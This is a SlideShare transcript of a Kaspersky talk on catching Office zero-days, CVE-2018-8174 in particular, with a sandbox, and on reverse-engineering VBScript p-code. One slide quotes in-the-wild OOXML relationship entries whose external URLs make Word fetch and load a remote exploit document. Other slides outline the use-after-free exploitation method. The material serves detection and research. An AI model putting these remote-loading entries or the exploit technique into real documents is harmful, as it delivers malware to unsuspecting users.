SlideShare a Scribd company logo

Catching Multilayered Zero-Day Attacks on MS Office

Kaspersky
Kaspersky

Over the past few years attacks leveraging Microsoft Office documents have become a weapon of choice for APT attacks. Office documents are popular not only with APT. It doesn’t take much time for malware authors to integrate novel techniques into their own Exploit Kits and attack ordinary users. Our statistics shows that only during 2018 amount of exploits attempts targeting MS Office increased by 4 times, making it the most targeted application in the world. In this presentation we would like to take a look at one of the most recent zero-day attacks against this platform, CVE-2018-8174, that introduced a completely new attack vector. Zero-day exploit utilized a technique to load an Internet Explorer engine component right into the process context of MS Office and exploited an unpatched VBScript vulnerability without any user interaction. This new technique changes current threat landscape, as vulnerabilities that previously could only be exploited from a browser in a drive-by-attack scenario can now be also abused from an Office document. This, and many other vulnerabilities was discovered with the help of our sandbox technology, that is proven to be very effective in catching even sophisticated, multilayered zero-day threats. In this presentation we would like to reveal how Sandbox can be utilized to catch this and many others zero-day attacks with our exploit and vulnerability detection system in our sandbox that is part KATA (Kaspersky Anti Targeted Attack Platform).

Software
1 of 61
Download to read offline
Boris Larin Vladislav Stolyarov Catching multilayered zero-day attacks on MS Office
$whoweare Malware Analyst (Heuristic Detection and Vulnerability Research Team) Boris Larin Malware Analyst (Heuristic Detection and Vulnerability Research Team) Vlad Stolyarov Twitter: @oct0xor Twitter: @vladhiewsha
1. Introduction to the MS Office threat landscape 2. Introduction to sandbox 3. Using sandbox to find MS Office zero-days 4. The story of CVE-2018-8174 (zero-day found with sandbox) 5. Internals of VBScript Talk Outline
4 Adobe Flash 13% Office 16%Android 19% Browsers 45% PDF 1% Java 6% 2016 Q4 Targeted platforms by attacked users Adobe Flash 1% Office 70% Android 12% Browsers 14% PDF 0% Java 3% 2018 Q4
5 CVE-2017-8759 CVE-2017-11826 CVE-2017-11882 CVE-2018-8174 20182017 5% 90% 5% CVE-2018-0802 CVE-2017-8570CVE-2017-0199 CVE-2014-6352 CVE-2014-4114 CVE-2012-1856 CVE-2015-1641 CVE-2017-0262CVE-2016-7193 90% 10% 2018 2016 CVE-2017-11292 CVE-2018-5002CVE-2016-7193 CVE-2016-4117 The life cycle of an Office exploit has shortened substantially. So has the entry bar: — In 2016, the most exploited vulnerabilities were two to four years old. They were also complex memory corruptions that required a high entry bar to exploit (Mscomctl and EPS vulnerabilities). — In 2018, the bar has lowered significantly and even a non-skilled person can create an exploit builder using PoCs from public resources (Moniker and Equation bugs). Sometimes the only thing that needs to be modified is the command line to be executed as payload. CVE-2018-4878 Timeline CVE-2017-0261CVE-2012-0158
6 Arsenal Most exploited Office vulnerabilities today Logical bugs are a thing: — As seen with three of the most popular CVEs: CVE-2017-0199, CVE-2017-8570 and CVE-2017-8759, even logical bugs can lead to Remote Command Execution Binary exploitation is possible on latest Office versions: — Code execution can be achieved even in a no-scriptable environment for several type of memory corruption bugs. — They can be just as reliable as logical ones – CVE-2017-11882 and CVE-2018- 0802 is a great example. Exploit for them worked on all Microsoft Office versions released in the past 17 years CVE-2017-8759 SOAP WSDL parser code injection vulnerability. The bug itself is in .NET framework, but can be triggered from document using SOAP moniker. Found exploited ITW CVE-2017-8570 “Bypass” of CVE-2017-0199 fix with the use of composite moniker CVE-2017-0199 Logical bug - scripts pointed to by URL moniker can be interpreted as HTA content without any restrictions Classical stack buffer overflow in legacy Microsoft Equation Editor componentCVE-2017-11882 Two different bugs in Equation Editor under the same CVE id. Discovered one month after CVE-2017-11882 patch CVE-2018-0802
7 Arsenal Most exploited Office vulnerabilities today Logical bugs are a thing: — As seen with three of the most popular CVEs: CVE-2017-0199, CVE-2017-8570 and CVE-2017-8759, even logical bugs can lead to Remote Command Execution Binary exploitation is possible on latest Office versions: — Code execution can be achieved even in a no-scriptable environment for several type of memory corruption bugs. — They can be just as reliable as logical ones – CVE-2017-11882 and CVE-2018- 0802 is a great example. Exploit for them worked on all Microsoft Office versions released in the past 17 years All of these vulnerabilities aren’t in the Office itself. CVE-2017-8759 SOAP WSDL parser code injection vulnerability. The bug itself is in .NET framework, but can be triggered from document using SOAP moniker. Found exploited ITW CVE-2017-8570 “Bypass” of CVE-2017-0199 fix with the use of composite moniker CVE-2017-0199 Logical bug - scripts pointed to by URL moniker can be interpreted as HTA content without any restrictions Classical stack buffer overflow in legacy Microsoft Equation Editor componentCVE-2017-11882 Two different bugs in Equation Editor under the same CVE id. Discovered one month after CVE-2017-11882 patch CVE-2018-0802
Attack surface is huge! Bad decisions from a security point of view Complicated file formats Deep integration with MS Windows Interoperability Legacy features
Obscure features – Exploitation primitives Attackers can gather their own statistics AV evasion / prevent zero-day from burning
Obscure features – Exploitation primitives “Added additional exploit mode, that allows with the use of “MWISTAT” statistics web-server log when and at what time the document was opened, was the payload downloaded, which IP-address was used, as well as some other information, such as User-Agent.” Attackers can gather their own statistics Cybercriminals: exploit.rtf
Obscure features – Exploitation primitives 1. Deploy decoy document 2. MS Office will automatically download and launch document with real exploit from remote storage <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="https://a.pomf.cat/hlxqom.doc" TargetMode="External" /> <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="http://kajlaraykaj.com/file/mine001.doc" TargetMode="External" /> <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" Target="http://jugnitv.com/final.jpg" TargetMode="External" /> AV Evasion / Prevent Zero-day from burning exploit_1.docxword_relsdocument.xml.rels exploit_2.docxword_relssettings.xml.rels exploit_3.docxword_relswebSettings.xml.rels
12 Caught in the wild… • CVE-2018-8174 (Windows VBScript Engine Remote Code Execution Vulnerability) • CVE-2018-8453 (Win32k Elevation of Privilege Vulnerability) • CVE-2018-8589 (Win32k Elevation of Privilege Vulnerability) In 2018 alone: All vulnerabilities were reported to Microsoft
The sandbox Artifacts assembled for analysis A file / URL for testing - Execution logs - Memory dumps - System / registry changes - Network connections - Screenshots - Exploit artifacts Verdict and rich data on activity Test VMs The file / URL is sent to several test VMs Artifacts logged
75 high-performance servers 2500 vCPUs 2000 virtual machines are running at any given time Up to four million objects per day are processed by the service at peak times Some facts
Design Guest OS User Mode Kernel Mode Process 1 Process 2 Kernel Drivers Syscall Filter API Logger Network Threads Registry Files Artifacts
API log [0XXX] >> ShellExecuteExW ("[HIDDEN_DIR]e15b36c2e394d599a8ab352159089dd2.doc") <PROCESS_CREATE_SUCCESS Pid="0xXXX" ParentPid="0xXXX" CreatedPid="0xYYY" /> <PROC_LOG_START Pid="0xYYY" RequestorPid="0xXXX" Reason="OnCreateChild"> <ImagePath>DeviceHarddiskVolumeZProgram Files (x86)Microsoft OfficeOffice14WINWORD.EXE</ImagePath> <CmdLine></CmdLine></PROC_LOG_START> <LOAD_IMAGE Pid="0xYYY" ImageBase="0x30000000" ImageSize="0x15d000"> <ImagePath>DeviceHarddiskVolumeZProgram Files (x86)Microsoft OfficeOffice14WINWORD.EXE</ImagePath></LOAD_IMAGE> <LOAD_IMAGE Pid="0xYYY" ImageBase="0x78e50000" ImageSize="0x1a9000"> <ImagePath>SystemRootSystem32ntdll.dll</ImagePath></LOAD_IMAGE> <LOAD_IMAGE Pid="0xYYY" ImageBase="0x7de70000" ImageSize="0x180000"> <ImagePath>SystemRootSysWOW64ntdll.dll</ImagePath></LOAD_IMAGE> [0YYY] >> SetWindowTextW (0000000000050018,00000000001875BC -> "e15b36c2e394d599a8ab352159089dd2.doc [Compatibility Mode] — Microsoft Word") => 00000000390A056C {0000} <FILE_CREATED Pid="0xYYY">
Exploit Checker Detection of exploits in scope of application and system wide — Exploited exceptions: — DEP violation — Heap corruption — Illegal/privileged instruction — Others — Stack execution — EoP detection — Predetection of Heap Spray — Execution of user space code in Ring 0 — Change of process token — Others Sandbox has support for plugins. One of the plugins is Exploit Checker.
Exploit Checker > API log […] UserSpaceSupervisorCPL(“VA:0000000001FC29C0”,allocbase=0000000001FC0000,base =0000000001FC2000,size=4096(0x1000),dumpBase=0000000001FC2000,dumpid=0xD) SecurityTokenChanged() […]
Looking for zero-days Signature-based protection Cloud-based protection Heuristic scanning HIPS and personal firewall Automatic exploit prevention System watcher Kaspersky security products for endpoints has very advanced heuristic capabilities in the detection of threats delivered through MS Office documents Heuristic engine is aware of all file formats and obfuscations for documents
Looking for zero-days Signature-based protection Cloud-based protection Heuristic scanning HIPS and personal firewall Automatic exploit prevention System Watcher Kaspersky security products for endpoints has very advanced heuristic capabilities in the detection of threats delivered through MS Office documents Heuristic engine is aware of all file formats and obfuscations for documents
Looking for zero-days Process file In case of exploits this is a very rare occurrence: high chance of a zero-day HEURISTIC SCANNING Clean SANDBOX Malicious
Looking for zero-days Process file File is recognized as malicious by heuristic scanning and sandbox Can it be a zero-day? HEURISTIC SCANNING Malicious SANDBOX Malicious
Looking for zero-days Process file File is recognized as malicious by heuristic scanning and sandbox. Can it be a zero-day? HEURISTIC SCANNING Malicious SANDBOX Malicious YES. It happens often.
Looking for zero-days bucket More generic detection logic versus Less generic detection logic Statistic Clustering
Clustering Interesting samples Interesting samples
CVE-2018-8174 (VirusTotal at 2018-04-18 06:50:30) Found in late April 2018 Was detected by our products prior to us finding it We would not have been able to find it if only samples that do not have detection were processed in the sandbox
CVE-2018-8174 Exploit is found in MS Office document But the vulnerability is in Internet Explorer This particular vulnerability and subsequent exploit are interesting for many reasons
28 CVE-2018-8174 – Exploit decodes to
29 CVE-2018-8174 – Exploit
30 CVE-2018-8174 – Exploit Is it CVE-2017-0199?
31 CVE-2017-0199 Strikes Back Response page is handled with mshtml.dll InProc COM Server, not mshta.exe. Content type in HTTP response header is ‘text/html’, and not ‘application/hta’. Well, not really
32 Enter CVE-2018-8174 — Initial RTF document contains single embedded OLE object with a URL Moniker, that downloads a page from provided link. — Now a COM object needs to be selected to handle the content. — Handler is selected based on extension, Content-Type and some other parameters. — Content-Type is ‘text/html’, which results in page being handled by mshtml.dll - library that contains the engine behind Internet Explorer. — A browser exploit is still required, because with MSHTML the scripts that are running in a restricted mode by default. — That was not true with CVE-2017-0199 – MSHTA handler is known to be a dangerous component that would run any VBJS scripts found in file unrestricted.
33 Enter CVE-2018-8174 Restricted COM objects from IActivationFilter in MSO.dll
34 Enter CVE-2018-8174 Restricted COM objects from IActivationFilter in MSO.dllBut not mshtml.HTMLDocument. (At least not yet).
VBScript Object Lifetime 35 Object Lifetime: How Objects Are Created and Destroyed (Visual Basic) After an object leaves scope, it is released by the common language runtime (CLR). Visual Basic controls the release of system resources using procedures called destructors. Together, constructors and destructors support the creation of robust and predictable class libraries. Constructors and destructors control the creation and destruction of objects. The Sub New and Sub Finalize procedures in Visual Basic initialize and destroy objects; they replace the Class_Initialize and Class_Terminate methods used in Visual Basic 6.0 and earlier versions. https://docs.microsoft.com/en-us/dotnet/visual-basic/programming-guide/language- features/objects-and-classes/object-lifetime-how-objects-are-created-and-destroyed
Object Lifetime: How Objects Are Created and Destroyed (Visual Basic) After an object leaves scope, it is released by the common language runtime (CLR). Visual Basic controls the release of system resources using procedures called destructors. Together, constructors and destructors support the creation of robust and predictable class libraries. Constructors and destructors control the creation and destruction of objects. The Sub New and Sub Finalize procedures in Visual Basic initialize and destroy objects; they replace the Class_Initialize and Class_Terminate methods used in Visual Basic 6.0 and earlier versions. VBScript Object Lifetime 36 https://docs.microsoft.com/en-us/dotnet/visual-basic/programming-guide/language- features/objects-and-classes/object-lifetime-how-objects-are-created-and-destroyed
CVE-2018-8174 – Use After Free 37 Object of ClassTerminateA is created and then instantly erased. Since reference counter is now zero this calls VBScript::Release for object to be freed by GC. While object is being freed an overridden Class_Terminate is called. We store dangling reference to deleted object in ArrWithUafA array. To balance out increased reference counter ArrWithFreedObject(1) is assigned to some other value. class1FreedObject is created after the loop. It will be allocated in the same memory that was used for ClassTerminateA objects.
CVE-2018-8174 – Use After Free 38
CVE-2018-8174 – Exploit 39 But this time it is used to allocate object of type Class2Reused This leads to us having 2 references – class1FreedObject and class2ReusedObject that point to same memory address and are instances of different Classes. The same procedure from before repeats to decrease reference counter 7 times and trigger Class_Terminate destructor again.
CVE-2018-8174 – Exploit This leads to us having 2 references – class1FreedObject and class2ReusedObject that point to same memory address and are instances of different Classes. Class1 Class2
CVE-2018-8174 – Exploit +0 +0x34 +0x74 +0 +0x48 +0x80 VVAL ‘P’ VVAL ‘P0123456789’ size: 0x32 + len(‘P’) = 0x34 size: 0x32 + len(‘P0123456789’) = 0x48 VVAL ‘SetProp’ size: 0x32 + len(‘SetProp’) = 0x40 VVAL ‘mem’ size: 0x32 + len(‘mem’) = 0x38 VVAL ‘SPP’ size: 0x32 + len(‘SPP’) = 0x38 VVAL ‘mem’ size: 0x32 + len(‘mem’) = 0x38 Class1 variables Class2 variables +0x74 +0x80 05 00 00 00 00 00 00 00 00 00 00 00 0C 20 00 00 08 00 00 00 00 00 00 00 A D D R 00 00 00 00Class1.mem Type Overwritten Class2.mem Type Class2.mem Data Class1.mem Data
VBScript interpreter Interpreter is closed source Implemented in vbscript.dll module VBScript is compiled into p-code that then is interpreted P-code is undocumented VBScript interpreter
43 • IE developer tools • Supports VBScript debugging • Visual studio • Possible to debug VBScript with wscript • wscript //D //X test.vbs • Not intended to debug exploits • Missing all crucial information to analyse vulnerabilities VBScript debugging
VBScript debugging: how-to Instrument script with calls to some uncommon function (e.g. CStr() ) Set breakpoint at this function in native debugger
VBScript’s p-code interpreter interpreter 112 cases (111 p-code instructions) int __thiscall CScriptRuntime::RunNoEH(CScriptRuntime *this, struct VAR *)
VBScript’s p-code != Visual Basic’s p-code http://web.archive.org/web/20101127044116/http://vb-decompiler.com/pcode/opcodes.php?t=1 1159 instructions in Visual Basic VS 111 instructions in VBScript Format of instructions is different Visual Basic’s opcodes
VBScript instructions Googling “VBScript” shows that there is no prior research on a subject However, it was possible to find two posts by Microsoft employees 2004 - https://blogs.msdn.microsoft.com/ericlippert/2004/04/19/runtime-typing-in-vbscript/ 1999 - https://groups.google.com/forum/#!topic/microsoft.public.inetserver.asp.general/xlCz5paTWxM
VBScript instructions Googling “VBScript” shows that there is no prior research on a subject However, it was possible to find 2 post of Microsoft employees 2004 - https://blogs.msdn.microsoft.com/ericlippert/2004/04/19/runtime-typing-in-vbscript/ 1999 - https://groups.google.com/forum/#!topic/microsoft.public.inetserver.asp.general/xlCz5paTWxM 2004
VBScript instructions Googling “VBScript” shows that there is no prior research on a subject However, it was possible to find 2 post of Microsoft employees 2004 - https://blogs.msdn.microsoft.com/ericlippert/2004/04/19/runtime-typing-in-vbscript/ 1999 - https://groups.google.com/forum/#!topic/microsoft.public.inetserver.asp.general/xlCz5paTWxM 2004 1999
Decoding VBScript instructions Now we know 18 out of 111 instructions! 1999 OP_FnBind 0x55 OP_LocalAdr 0x19 OP_Bos1 0x03 OP_FixType 0x54 OP_NamedAdr 0x1D OP_EQ 0x42 OP_IntConst 0x0B OP_BitOr 0x3E OP_CallNmdAdr 0x28 OP_JccFalse 0x3C OP_CallMemVoid 0x31 OP_LocalSt 0x1A OP_Bos0 0x02 OP_Jmp 0x3A OP_FuncEnd 0x01 OP_Sub 0x49 OP_FnReturn 0x57 OP_Add 0x48
Family Visual Basic Visual Basic for Applications (VBA) Visual Basic Scripting Edition (VBScript) eMbedded Visual Basic (eVB)
eMbedded Visual Basic (eVB) Windows CE Windows Mobile Based on VBScript IMG: https://www.amazon.com/ViewSonic-V35-Pocket-PC-Handheld/dp/B00006RSK5
eMbedded Visual Basic (eVB) Download and unpack eMbedded Visual Basic (eVB) Runtime .cab Biggest file is 00pvbvbs.022 Lets load it in IDA Pro
eMbedded Visual Basic (eVB) It’s a debug build!
VBScript opcodes
VBScript opcodes 101 instruction in eVB against 111 in VBScript
Mapping of eVB instructions to VBScript instructions eVB VBScript New instructions
VBScript p-code disassembly
• Microsoft Office is a hot target for attackers and will remain so • Attackers aim for the easiest targets and legacy features will be abused • A sandbox is effective in the detection of zero-days (proven with a long list of CVE’s) Highlights about our sandbox: • https://securelist.com/a-modern-hypervisor-as-a-basis-for-a-sandbox/81902/ • https://www.kaspersky.com/enterprise-security/wiki-section/products/sandbox • There is the possibility of more VBScript vulnerabilities exploited through Microsoft Office • VBScript controls are blocked by default in Office 365 • We shared our tools with the community to make the debugging of VBScript exploits easier Conclusions
Source code https://github.com/KasperskyLab/VBscriptInternals VBScript p-code disassemblers for WinDBG and IDA Pro
LET’S TALK? Boris Larin @oct0xor Vlad Stolyarov @vladhiewsha

Recommended

How We Stopped Being Just Antivirus and Became a Unique Industrial Infrastruc...
How We Stopped Being Just Antivirus and Became a Unique Industrial Infrastruc...How We Stopped Being Just Antivirus and Became a Unique Industrial Infrastruc...
How We Stopped Being Just Antivirus and Became a Unique Industrial Infrastruc...
Kaspersky
 
Антон Иванов. Kaspersky Open Single Management Platform – XDR платформа для в...
Антон Иванов. Kaspersky Open Single Management Platform – XDR платформа для в...Антон Иванов. Kaspersky Open Single Management Platform – XDR платформа для в...
Антон Иванов. Kaspersky Open Single Management Platform – XDR платформа для в...
Kaspersky
 
From Code to Customer: How to Make Software Products Secure
From Code to Customer: How to Make Software Products SecureFrom Code to Customer: How to Make Software Products Secure
From Code to Customer: How to Make Software Products Secure
Kaspersky
 
Industrial Threats Landscape, H2'2017
Industrial Threats Landscape, H2'2017Industrial Threats Landscape, H2'2017
Industrial Threats Landscape, H2'2017
Kaspersky
 
Kaspersky Kesb ep10 no_cm_v01a
Kaspersky Kesb ep10 no_cm_v01aKaspersky Kesb ep10 no_cm_v01a
Kaspersky Kesb ep10 no_cm_v01a
Igor Pandzic
 
Артем Зиненко. Vulnerability Assessment в ICS на основе информации из публичн...
Артем Зиненко. Vulnerability Assessment в ICS на основе информации из публичн...Артем Зиненко. Vulnerability Assessment в ICS на основе информации из публичн...
Артем Зиненко. Vulnerability Assessment в ICS на основе информации из публичн...
Kaspersky
 
Ransomware in targeted attacks
Ransomware in targeted attacksRansomware in targeted attacks
Ransomware in targeted attacks
Kaspersky
 
Хакеро-машинный интерфейс
Хакеро-машинный интерфейсХакеро-машинный интерфейс
Хакеро-машинный интерфейс
Positive Hack Days
 

Recommended

How We Stopped Being Just Antivirus and Became a Unique Industrial Infrastruc...
How We Stopped Being Just Antivirus and Became a Unique Industrial Infrastruc...How We Stopped Being Just Antivirus and Became a Unique Industrial Infrastruc...
How We Stopped Being Just Antivirus and Became a Unique Industrial Infrastruc...
Kaspersky
 
Антон Иванов. Kaspersky Open Single Management Platform – XDR платформа для в...
Антон Иванов. Kaspersky Open Single Management Platform – XDR платформа для в...Антон Иванов. Kaspersky Open Single Management Platform – XDR платформа для в...
Антон Иванов. Kaspersky Open Single Management Platform – XDR платформа для в...
Kaspersky
 
From Code to Customer: How to Make Software Products Secure
From Code to Customer: How to Make Software Products SecureFrom Code to Customer: How to Make Software Products Secure
From Code to Customer: How to Make Software Products Secure
Kaspersky
 
Industrial Threats Landscape, H2'2017
Industrial Threats Landscape, H2'2017Industrial Threats Landscape, H2'2017
Industrial Threats Landscape, H2'2017
Kaspersky
 
Kaspersky Kesb ep10 no_cm_v01a
Kaspersky Kesb ep10 no_cm_v01aKaspersky Kesb ep10 no_cm_v01a
Kaspersky Kesb ep10 no_cm_v01a
Igor Pandzic
 
Артем Зиненко. Vulnerability Assessment в ICS на основе информации из публичн...
Артем Зиненко. Vulnerability Assessment в ICS на основе информации из публичн...Артем Зиненко. Vulnerability Assessment в ICS на основе информации из публичн...
Артем Зиненко. Vulnerability Assessment в ICS на основе информации из публичн...
Kaspersky
 
Ransomware in targeted attacks
Ransomware in targeted attacksRansomware in targeted attacks
Ransomware in targeted attacks
Kaspersky
 
Хакеро-машинный интерфейс
Хакеро-машинный интерфейсХакеро-машинный интерфейс
Хакеро-машинный интерфейс
Positive Hack Days
 
Kaspersky Lab Transparency Principles
Kaspersky Lab Transparency PrinciplesKaspersky Lab Transparency Principles
Kaspersky Lab Transparency Principles
Kaspersky
 
How to use mtr 2
How to use mtr 2How to use mtr 2
How to use mtr 2
Eduardo Narvaez
 
Дмитрий Правиков. Концепция информационной безопасности «роя» киберфизических...
Дмитрий Правиков. Концепция информационной безопасности «роя» киберфизических...Дмитрий Правиков. Концепция информационной безопасности «роя» киберфизических...
Дмитрий Правиков. Концепция информационной безопасности «роя» киберфизических...
Kaspersky
 
Opc e book_2021_3rd_edition_lay06
Opc e book_2021_3rd_edition_lay06Opc e book_2021_3rd_edition_lay06
Opc e book_2021_3rd_edition_lay06
Tiago Oliveira
 
Джан Демирел (Турция). Текущий статус регулирования промышленной кибербезопас...
Джан Демирел (Турция). Текущий статус регулирования промышленной кибербезопас...Джан Демирел (Турция). Текущий статус регулирования промышленной кибербезопас...
Джан Демирел (Турция). Текущий статус регулирования промышленной кибербезопас...
Kaspersky
 
Trusted Environment. Blockchain for business: best practices, experience, tips
Trusted Environment. Blockchain for business: best practices, experience, tipsTrusted Environment. Blockchain for business: best practices, experience, tips
Trusted Environment. Blockchain for business: best practices, experience, tips
Kaspersky
 
Detecting ICS Attacks Using Recurrent Neural Networks
Detecting ICS Attacks Using Recurrent Neural NetworksDetecting ICS Attacks Using Recurrent Neural Networks
Detecting ICS Attacks Using Recurrent Neural Networks
Kaspersky
 
Ecosystem
EcosystemEcosystem
Ecosystem
Moti Sagey מוטי שגיא
 
Moti Sagey CPX keynote _Are All security products created equal
Moti Sagey CPX keynote _Are All security products created equal Moti Sagey CPX keynote _Are All security products created equal
Moti Sagey CPX keynote _Are All security products created equal
Moti Sagey מוטי שגיא
 
Механизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CoreМеханизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET Core
Positive Hack Days
 
Next Generation Embedded Systems Security for IOT: Powered by Kaspersky
Next Generation Embedded Systems Security for IOT: Powered by KasperskyNext Generation Embedded Systems Security for IOT: Powered by Kaspersky
Next Generation Embedded Systems Security for IOT: Powered by Kaspersky
L. Duke Golden
 
SANS ICS Security Survey Report 2016
SANS ICS Security Survey Report 2016 SANS ICS Security Survey Report 2016
SANS ICS Security Survey Report 2016
Derek Harp
 
Owasp masvs spain 17
Owasp masvs spain 17Owasp masvs spain 17
Owasp masvs spain 17
Luis A. Solís
 
Check point response to Cisco NGFW competitive
Check point response to Cisco NGFW competitiveCheck point response to Cisco NGFW competitive
Check point response to Cisco NGFW competitive
Moti Sagey מוטי שגיא
 
Challenges and opportunities for European MSPs
Challenges and opportunities for European MSPsChallenges and opportunities for European MSPs
Challenges and opportunities for European MSPs
Kaspersky
 
Check Point mission statement
Check Point mission statementCheck Point mission statement
Check Point mission statement
Moti Sagey מוטי שגיא
 
iViZ Profile
iViZ ProfileiViZ Profile
iViZ Profile
iViZ Security
 
【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】
【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】
【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】
Hacks in Taiwan (HITCON)
 
Kaspersky endpoint security business presentation
Kaspersky endpoint security business presentationKaspersky endpoint security business presentation
Kaspersky endpoint security business presentation
Data Unit
 
Secure and power the intelligent edge with Azure Sphere
Secure and power the intelligent edge with Azure SphereSecure and power the intelligent edge with Azure Sphere
Secure and power the intelligent edge with Azure Sphere
Microsoft Tech Community
 
Drive By Downloads: How To Avoid Getting a Cap Popped in Your App
Drive By Downloads: How To Avoid Getting a Cap Popped in Your App Drive By Downloads: How To Avoid Getting a Cap Popped in Your App
Drive By Downloads: How To Avoid Getting a Cap Popped in Your App
Cenzic
 
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
Felipe Prado
 

More Related Content

What's hot

Дмитрий Правиков. Концепция информационной безопасности «роя» киберфизических...
Дмитрий Правиков. Концепция информационной безопасности «роя» киберфизических...Дмитрий Правиков. Концепция информационной безопасности «роя» киберфизических...
Дмитрий Правиков. Концепция информационной безопасности «роя» киберфизических...
Kaspersky
 
Trusted Environment. Blockchain for business: best practices, experience, tips
Trusted Environment. Blockchain for business: best practices, experience, tipsTrusted Environment. Blockchain for business: best practices, experience, tips
Trusted Environment. Blockchain for business: best practices, experience, tips
Kaspersky
 
Detecting ICS Attacks Using Recurrent Neural Networks
Detecting ICS Attacks Using Recurrent Neural NetworksDetecting ICS Attacks Using Recurrent Neural Networks
Detecting ICS Attacks Using Recurrent Neural Networks
Kaspersky
 
Механизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CoreМеханизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET Core
Positive Hack Days
 

What's hot (20)

Kaspersky Lab Transparency Principles
Kaspersky Lab Transparency PrinciplesKaspersky Lab Transparency Principles
Kaspersky Lab Transparency Principles
 
How to use mtr 2
How to use mtr 2How to use mtr 2
How to use mtr 2
 
Дмитрий Правиков. Концепция информационной безопасности «роя» киберфизических...
Дмитрий Правиков. Концепция информационной безопасности «роя» киберфизических...Дмитрий Правиков. Концепция информационной безопасности «роя» киберфизических...
Дмитрий Правиков. Концепция информационной безопасности «роя» киберфизических...
 
Opc e book_2021_3rd_edition_lay06
Opc e book_2021_3rd_edition_lay06Opc e book_2021_3rd_edition_lay06
Opc e book_2021_3rd_edition_lay06
 
Джан Демирел (Турция). Текущий статус регулирования промышленной кибербезопас...
Джан Демирел (Турция). Текущий статус регулирования промышленной кибербезопас...Джан Демирел (Турция). Текущий статус регулирования промышленной кибербезопас...
Джан Демирел (Турция). Текущий статус регулирования промышленной кибербезопас...
 
Trusted Environment. Blockchain for business: best practices, experience, tips
Trusted Environment. Blockchain for business: best practices, experience, tipsTrusted Environment. Blockchain for business: best practices, experience, tips
Trusted Environment. Blockchain for business: best practices, experience, tips
 
Detecting ICS Attacks Using Recurrent Neural Networks
Detecting ICS Attacks Using Recurrent Neural NetworksDetecting ICS Attacks Using Recurrent Neural Networks
Detecting ICS Attacks Using Recurrent Neural Networks
 
Ecosystem
EcosystemEcosystem
Ecosystem
 
Moti Sagey CPX keynote _Are All security products created equal
Moti Sagey CPX keynote _Are All security products created equal Moti Sagey CPX keynote _Are All security products created equal
Moti Sagey CPX keynote _Are All security products created equal
 
Механизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CoreМеханизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET Core
 
Next Generation Embedded Systems Security for IOT: Powered by Kaspersky
Next Generation Embedded Systems Security for IOT: Powered by KasperskyNext Generation Embedded Systems Security for IOT: Powered by Kaspersky
Next Generation Embedded Systems Security for IOT: Powered by Kaspersky
 
SANS ICS Security Survey Report 2016
SANS ICS Security Survey Report 2016 SANS ICS Security Survey Report 2016
SANS ICS Security Survey Report 2016
 
Owasp masvs spain 17
Owasp masvs spain 17Owasp masvs spain 17
Owasp masvs spain 17
 
Check point response to Cisco NGFW competitive
Check point response to Cisco NGFW competitiveCheck point response to Cisco NGFW competitive
Check point response to Cisco NGFW competitive
 
Challenges and opportunities for European MSPs
Challenges and opportunities for European MSPsChallenges and opportunities for European MSPs
Challenges and opportunities for European MSPs
 
Check Point mission statement
Check Point mission statementCheck Point mission statement
Check Point mission statement
 
iViZ Profile
iViZ ProfileiViZ Profile
iViZ Profile
 
【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】
【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】
【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】
 
Kaspersky endpoint security business presentation
Kaspersky endpoint security business presentationKaspersky endpoint security business presentation
Kaspersky endpoint security business presentation
 
Secure and power the intelligent edge with Azure Sphere
Secure and power the intelligent edge with Azure SphereSecure and power the intelligent edge with Azure Sphere
Secure and power the intelligent edge with Azure Sphere
 

Similar to Catching Multilayered Zero-Day Attacks on MS Office

Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007
Stephan Chenette
 
"Wie passen Serverless & Autonomous zusammen?"
"Wie passen Serverless & Autonomous zusammen?""Wie passen Serverless & Autonomous zusammen?"
"Wie passen Serverless & Autonomous zusammen?"
Volker Linz
 

Similar to Catching Multilayered Zero-Day Attacks on MS Office (20)

Drive By Downloads: How To Avoid Getting a Cap Popped in Your App
Drive By Downloads: How To Avoid Getting a Cap Popped in Your App Drive By Downloads: How To Avoid Getting a Cap Popped in Your App
Drive By Downloads: How To Avoid Getting a Cap Popped in Your App
 
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
 
Transforming your Security Products at the Endpoint
Transforming your Security Products at the EndpointTransforming your Security Products at the Endpoint
Transforming your Security Products at the Endpoint
 
Two-For-One Talk: Malware Analysis for Everyone
Two-For-One Talk: Malware Analysis for EveryoneTwo-For-One Talk: Malware Analysis for Everyone
Two-For-One Talk: Malware Analysis for Everyone
 
News Bytes - May by corrupt
News Bytes - May by corruptNews Bytes - May by corrupt
News Bytes - May by corrupt
 
OWASP Europe Summit Portugal 2008. Web Application Assessments
